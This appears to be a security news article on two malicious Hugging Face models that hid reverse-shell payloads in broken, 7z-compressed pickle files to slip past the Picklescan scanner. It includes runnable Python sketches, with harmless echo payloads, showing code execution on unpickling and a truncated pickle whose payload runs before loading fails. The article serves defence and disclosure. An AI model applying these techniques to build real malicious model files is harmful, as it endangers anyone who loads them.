Cybersecurity researchers have uncovered two malicious machine learning (ML) models on Hugging Face that leveraged an unusual technique of "broken" pickle files to evade detection.
"The pickle files extracted from the mentioned PyTorch archives revealed the malicious Python content at the beginning of the file," ReversingLabs researcher Karlo Zanki said in a report shared with The Hacker News. "In both instances, the malicious payload was a typical platform-aware reverse shell that connects to a hard-coded IP address."
The approach has been dubbed nullifAI, as it involves clear attempts to sidestep existing safeguards put in place to identify malicious models. The Hugging Face repositories are listed below –
- glockr1/ballr7
- who-r-u0000/0000000000000000000000000000000000000
It's believed that the models are more of a proof-of-concept (PoC) than an active supply chain attack scenario.
The pickle serialization format, commonly used for distributing ML models, has been repeatedly found to be a security risk, as it offers ways to execute arbitrary code as soon as such files are loaded and deserialized.
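The risk boils down to pickle's __reduce__ hook, which lets a serialized object name an arbitrary callable to be invoked during deserialization. The minimal sketch below (hypothetical and deliberately benign, not code from the discovered models) shows a command executing the moment a pickle is loaded:

```python
# Minimal sketch, not taken from the discovered models: __reduce__ lets an
# object tell pickle to call any function at load time. Here it is a benign
# echo, but it could just as easily spawn a reverse shell.
import os
import pickle

class Payload:
    def __reduce__(self):
        # During unpickling, pickle calls os.system(...) with this argument.
        return (os.system, ("echo code ran during unpickling",))

blob = pickle.dumps(Payload())
pickle.loads(blob)  # the command runs here, before any model data is touched
```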

The two models detected by the cybersecurity company are stored in the PyTorch format, which is nothing but a compressed pickle file. While PyTorch uses the ZIP format for compression by default, the identified models were found to be compressed using the 7z format.
As a result, this behavior made it possible for the models to fly under the radar and avoid getting flagged as malicious by Picklescan, a tool used by Hugging Face to detect suspicious pickle files.
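As a hedged illustration (not ReversingLabs' actual tooling), the mismatch can be spotted from the archive's magic bytes: a default torch.save() output is a ZIP container, while a 7z archive carries a different signature. The file name below is hypothetical:

```python
# Illustrative sketch (file name is hypothetical): a standard PyTorch archive
# is a ZIP container whose first bytes are the ZIP signature, whereas a 7z
# archive starts with "7z\xbc\xaf\x27\x1c", unexpected for a .pth model file.
def archive_kind(path: str) -> str:
    with open(path, "rb") as f:
        magic = f.read(6)
    if magic.startswith(b"PK\x03\x04"):
        return "zip (expected for torch.save output)"
    if magic == b"7z\xbc\xaf\x27\x1c":
        return "7z (unexpected for a PyTorch model)"
    return "unknown"

print(archive_kind("suspect_model.pth"))
```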
"An interesting thing about this Pickle file is that the object serialization, the purpose of the Pickle file, breaks soon after the malicious payload is executed, resulting in the failure of the object's decompilation," Zanki said.
Further analysis has revealed that such broken pickle files can still be partially deserialized due to the discrepancy between Picklescan and how deserialization works, causing the malicious code to be executed despite the tool throwing an error message. The open-source utility has since been updated to fix this bug.
"The reason for this behavior is that the object deserialization is performed on Pickle files sequentially," Zanki noted.
"Pickle opcodes are executed as they are encountered, and until all opcodes are executed or a broken instruction is encountered. In the case of the discovered model, since the malicious payload is inserted at the beginning of the Pickle stream, execution of the model wouldn't be detected as unsafe by Hugging Face's existing security scanning tools."
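Zanki's description can be reproduced with a short sketch (hypothetical and benign, not the actual malicious model): strip the trailing STOP opcode from a pickle stream and the payload placed earlier in the stream still runs before the truncation error surfaces.

```python
# Minimal sketch, not the actual malicious model: a deliberately "broken"
# pickle whose payload still executes. Opcodes run sequentially, so the
# os.system call fires before the truncated ending makes loading fail.
import os
import pickle

class Payload:
    def __reduce__(self):
        return (os.system, ("echo payload already executed",))

blob = pickle.dumps(Payload())

try:
    # Drop the final STOP opcode so deserialization cannot complete.
    pickle.loads(blob[:-1])
except Exception as exc:
    print("unpickling failed only after the payload ran:", exc)
```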